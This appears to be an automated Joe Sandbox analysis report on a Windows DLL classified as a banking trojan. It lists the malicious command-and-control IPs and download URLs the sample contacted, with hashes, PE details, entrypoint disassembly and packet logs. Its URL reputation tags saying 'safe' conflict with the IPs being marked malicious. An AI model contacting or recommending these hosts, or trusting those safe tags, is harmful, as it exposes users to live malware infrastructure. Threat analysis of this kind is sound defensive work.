                        https://185.56.219.47:8116/0loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/aloaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpfalse
                          unknown
                          https://192.46.210.220/kloaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://45.77.0.96:6891/der6loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://192.46.210.220/eloaddll32.exe, 00000000.00000002.689702912.0000000000958000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://45.77.0.96:6891/6loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://45.77.0.96:6891/der.loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://45.77.0.96:6891/Microsoftloaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://14.77.0.96:6891/loaddll32.exe, 00000000.00000003.563593432.000000000095A000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          45.77.0.96
                          unknownUnited States
                          20473AS-CHOOPAUStrue
                          185.56.219.47
                          unknownItaly
                          202675KELIWEBITtrue
                          192.46.210.220
                          unknownUnited States
                          5501FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGetrue
                          143.244.140.214
                          unknownUnited States
                          174COGENT-174UStrue

                          General Information

                          Joe Sandbox Version:33.0.0 White Diamond
                          Analysis ID:510689
                          Start date:28.10.2021
                          Start time:05:09:04
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 9m 5s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:SecuriteInfo.com.Variant.Razy.980776.8232.dll
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Run name:Run with higher sleep bypass
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal92.bank.troj.evad.winDLL@11/1@0/4
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 14.5% (good quality ratio 14.5%)
                          • Quality average: 78.9%
                          • Quality standard deviation: 16%
                          HCA Information:
                          • Successful, ratio: 64%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                          • Found application associated with file extension: .dll
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded IPs from analysis (whitelisted): 20.82.210.154, 173.222.108.210, 173.222.108.226, 20.50.102.62, 80.67.82.235, 80.67.82.211, 52.251.79.25, 40.112.88.60, 20.54.110.249
                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtEnumerateKey calls found.
                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          05:11:10API Interceptor25x Sleep call for process: rundll32.exe modified
                          05:11:13API Interceptor36x Sleep call for process: loaddll32.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          45.77.0.96SecuriteInfo.com.Variant.Razy.980776.19527.dllGet hashmaliciousBrowse
                            SecuriteInfo.com.Variant.Razy.980776.5008.dllGet hashmaliciousBrowse
                              SecuriteInfo.com.Variant.Razy.980776.19803.dllGet hashmaliciousBrowse
                                SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                  SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                    SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                      SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                        SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                          SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                            SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                              SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                  185.56.219.47SecuriteInfo.com.Variant.Razy.980776.19527.dllGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Variant.Razy.980776.5008.dllGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Variant.Razy.980776.19803.dllGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                    SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse

                                                                                                          Domains

                                                                                                          No context

                                                                                                          ASN

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          KELIWEBITSecuriteInfo.com.Variant.Razy.980776.19527.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.5008.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.19803.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          AS-CHOOPAUSSecuriteInfo.com.Variant.Razy.980776.19527.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.5008.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.19803.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          51c64c77e60f3980eea90869b68c58a8SecuriteInfo.com.Variant.Razy.980776.19527.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.5008.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.19803.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          File Type:data
                                                                                                          Category:modified
                                                                                                          Size (bytes):326
                                                                                                          Entropy (8bit):3.4145988351536807
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:kKP148EMl/s8gFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:XqW/Y2kPlE99SNxAhUefit
                                                                                                          MD5:C824601B37315775244B5F3E184E9784
                                                                                                          SHA1:BE13B9570195223FB1905895CA1B5F9056176976
                                                                                                          SHA-256:F1E30158F2A271948414554A5A7EAB87E175607772C6850C875084DDDBF130BF
                                                                                                          SHA-512:BA4E3BD1F6697124F2706659144894B7CB9DF7CF66B8DED8BDDE4A59EE453FF21DAB20A1751B90A800A011EB4C74C8E9CFC412ACA17585E3091789A3595253C6
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview: p...... ..........+9....(...............................................5....... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.439735798494042
                                                                                                          TrID:
                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:SecuriteInfo.com.Variant.Razy.980776.8232.dll
                                                                                                          File size:1375232
                                                                                                          MD5:6df0687582c592e9860683a68858e082
                                                                                                          SHA1:53780def0699c055381746ce4ecebef8f17fd12d
                                                                                                          SHA256:90877ec621cc53fc31e693362e3b335a429aecc77abdbfd8b7d5d7493478f36d
                                                                                                          SHA512:43c27e2af87306bd6389af980e50dffc2b219868881db1a026d56eef7b012f94d11426cf82338901c7e950b463e1e7a8e8f0f7563040a3b5c013b4a39906a376
                                                                                                          SSDEEP:24576:anxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7i:acfk82uAJTI7EPswKwuG
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:...~...~...~.....8.z...w.X._...,...z...,...l...,...c...,...[.....<.f...~.......,.......,.......,.3.....,.......Rich~..........

                                                                                                          File Icon

                                                                                                          Icon Hash:74f0e4ecccdce0e4

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x4336b0
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                          Time Stamp:0x5BBD73BC [Wed Oct 10 03:36:28 2018 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:6
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:6
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:6
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          cmp dword ptr [ebp+0Ch], 01h
                                                                                                          jne 00007F7AACA7D5A7h
                                                                                                          call 00007F7AACA7E2D7h
                                                                                                          mov eax, dword ptr [ebp+10h]
                                                                                                          push eax
                                                                                                          mov ecx, dword ptr [ebp+0Ch]
                                                                                                          push ecx
                                                                                                          mov edx, dword ptr [ebp+08h]
                                                                                                          push edx
                                                                                                          call 00007F7AACA7D396h
                                                                                                          add esp, 0Ch
                                                                                                          pop ebp
                                                                                                          retn 000Ch
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          mov eax, dword ptr [0054806Ch]
                                                                                                          xor edx, edx
                                                                                                          mov ecx, 00000020h
                                                                                                          div ecx
                                                                                                          push edx
                                                                                                          mov edx, dword ptr [ebp+08h]
                                                                                                          xor edx, dword ptr [0054806Ch]
                                                                                                          push edx
                                                                                                          call 00007F7AACA7D5E4h
                                                                                                          add esp, 08h
                                                                                                          pop ebp
                                                                                                          ret
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          mov eax, dword ptr [0054806Ch]
                                                                                                          xor edx, edx
                                                                                                          mov ecx, 00000020h
                                                                                                          div ecx
                                                                                                          mov eax, 00000020h
                                                                                                          sub eax, edx
                                                                                                          push eax
                                                                                                          mov ecx, dword ptr [ebp+08h]
                                                                                                          push ecx
                                                                                                          call 00007F7AACA7D5B3h
                                                                                                          add esp, 08h
                                                                                                          xor eax, dword ptr [0054806Ch]
                                                                                                          pop ebp
                                                                                                          ret
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                                          mov ecx, dword ptr [ebp+0Ch]
                                                                                                          ror eax, cl
                                                                                                          pop ebp
                                                                                                          ret
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          call 00007F7AACA7E93Dh
                                                                                                          push eax
                                                                                                          call 00007F7AACABF647h
                                                                                                          add esp, 04h
                                                                                                          pop ebp
                                                                                                          ret
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          sub esp, 18h
                                                                                                          mov eax, dword ptr [ebp+00h]

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000xc5e2f0xc6000False0.442065922901data6.47813133498IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0xc70000x80aec0x80c00False0.534103837985data5.52051601648IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                          Exports

                                                                                                          NameOrdinalAddress
                                                                                                          Bluewing10x49eed0
                                                                                                          Earth20x49efd0
                                                                                                          Masterjust30x49eb20

                                                                                                          Network Behavior

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 28, 2021 05:11:08.698909044 CEST49743443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:08.698950052 CEST44349743192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:08.699048996 CEST49743443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:08.718422890 CEST49743443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:08.718451977 CEST44349743192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:09.246706963 CEST44349743192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:09.246882915 CEST49743443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:09.564222097 CEST49743443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:09.564249039 CEST44349743192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:09.564537048 CEST44349743192.46.210.220192.168.2.3
                                                                                                          Oct 28, 2021 05:11:09.564613104 CEST49743443192.168.2.3192.46.210.220
                                                                                                          Oct 28, 2021 05:11:09.567332029 CEST49743443192.168.2.3192.46.210.220
